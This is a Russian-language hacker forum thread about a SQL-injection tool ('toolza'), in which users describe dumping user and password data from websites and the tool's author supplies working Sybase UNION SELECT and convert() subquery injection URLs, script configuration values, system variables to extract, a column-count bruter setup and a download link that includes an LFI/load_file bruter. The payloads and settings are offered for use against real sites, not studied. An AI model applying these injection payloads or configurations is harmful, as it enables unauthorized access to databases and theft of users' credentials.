update: - добавлен альтернативный метод получения содержимого страницы - в MySql разделе устранены баги в случаях, когда имена БД или таблиц содержали "-"
ну тулза меня поражает своей скоростью, но есть одинь баг. Когда работаеш черз name_const или floor rand бдинд то все норм сливает до того как возмеш всю структуру. Но когда придется дело до слива юзеров то сливает очень быстро(номер слива видно быстро изменяется) но результат выводится 1 от 10-30. Тоесть если слит 100 то из них выводится тока макс 10 и то мало. Попробовал изменит потом до 1 но все же, пришлось юзать готовый сорс с готовым запросом который изменяет тока номер лимита ((. Но скорость не айс
дай пример в личку, чото не очень вогнал, о чем ты. PS: Или пиши на инглише, может быть так будет внятней)
Разобрался - что name_const, что floor(rand()) методы имеют ограничение по длине возвращаемых результатов, т.е. в принципе не особо предназначены для дампа данных сразу из кучи колонок, тем более с паролями. В скрипте идет concat() и т.д. приставки для того, чтобы данные вообще можно было как-то спарсить, так что то, что видно в браузере, не факт, что спарсится прогой. Выводы делайте сами. PS: Т.е. тулза работает корректно, однако на все есть "квантификаторы жадности" )
ну спс и зато что поддерживаеш прогу, если есть ограничение по длине то эт можно обходит поставив готовый запрос на другой сорец, главное тулза просто отлично справляется со своим заданием, респект тебе. Если конечно возможно добав функцию блинд на mssql тоже. Я слил бд на мсскл по блинду но на другом софте. Хотелось бы чтоб тулза тоже поддерживал такую функцию
update: Sybase: 1 . UNION SELECT method: Code: http://site.com/index.phtml?pid=7+union+select+null,@@version,null Настройки в скрипте: $s_union_select_url = "http://site.com/index.phtml?pid=7+union+select+null,^,null"; # url UNION+SELECT method $s_subquery_url = ""; # url SUBQUERY method $s_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method $s_filtr = "--"; # close SQL $s_plus = "+"; # %20,%2b & etc. $s_convert = "numeric"; # default type to convert - numeric (for subquery method) 1 . SUBQUERY method: Code: http://site.com/index.phtml?pid=-7+or+1=convert(numeric,(select+@@version))--+ Настройки в скрипте: $s_union_select_url = ""; # url UNION+SELECT method $s_subquery_url = "http://site.com/index.phtml?pid=-7+or+1="; # url SUBQUERY method $s_method = 1; # 0 - UNION+SELECT method, 1 - SUBQUERY method $s_filtr = "--+"; # close SQL $s_plus = "+"; # %20,%2b & etc. $s_convert = "numeric"; # default type to convert - numeric (for subquery method) + системные данные: Code: @@version user_name() @@boottime @@errorlog @@language @@servername db_name()
Выкладываем то что есть (потом Пашкела сам сортирует) режим LFI/READER/Load_file() bruter - сжатый(3,12 Мб), распаковынный(120 Мб) Скачать
Всё, нашел бекапы, уже перезаливаю, через час все будет на месте last version - http://bug-track.ru/prog/toolza1.0.zip All videos on the places
pashkela бро тулза прекрасно справляется со своей задачей респект. Если сможеш добав функцию чтоб инжектил и на Header. Чтоб можно было свою дополнитую хедер добавит с инжектом. Много скули на хедере но тулза не поддерживает ((
У меня вопрос по "MySQL injection column number bruter" Как указать скрипту что нужно в определенном параметре вставлять брут? например: www.pupkin.com/index.php?param1=тут уязвим параметр¶m2=13
ну если к примеру хотим получить чонить такое: www.pupkin.com/index.php?param1=1+union+select+1,2,3--+¶m2=13 то так: Code: $source_sql_c = "www.pupkin.com/index.php?param1=1";# url $filtr_c = "--+¶m2=13"; # close SQL $plus_c = "+"; # /**/,%20,%2b & etc. $sql_mess = "Different number of columns";# Текст идентификатор правильного/неправильного запроса $sql_mess_type = 0;# Тип текста идентификатора, 1 - когда запрос правильный, 0 - когда запрос неправильный т.е. просто "рубим" ссылку пополам в том месте, куда предполагаем вставлять "+union+select+1,2,3....."
ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё )) при твоем условиии так www.pupkin.com/index.php?param2=13¶m1=1+union+select+1,2,3--+ пашет как на www.pupkin.com/index.php?param1=1+union+select+1,2,3--+¶m2=13 но удобно автоматизировать, так как если там много параметров по с примером пашкелы будет длинный коммент типа: $filtr_c = "--+¶m2=13¶m2=1543¶m3=43¶m5=545¶m6=132342¶m7=54¶m8=13"; # close SQL
Спасибо за помощь ) да действительно, чет я не догадался что параметры можно местами поменять ) Вот еще бы была реализация для лома через куки и хидер )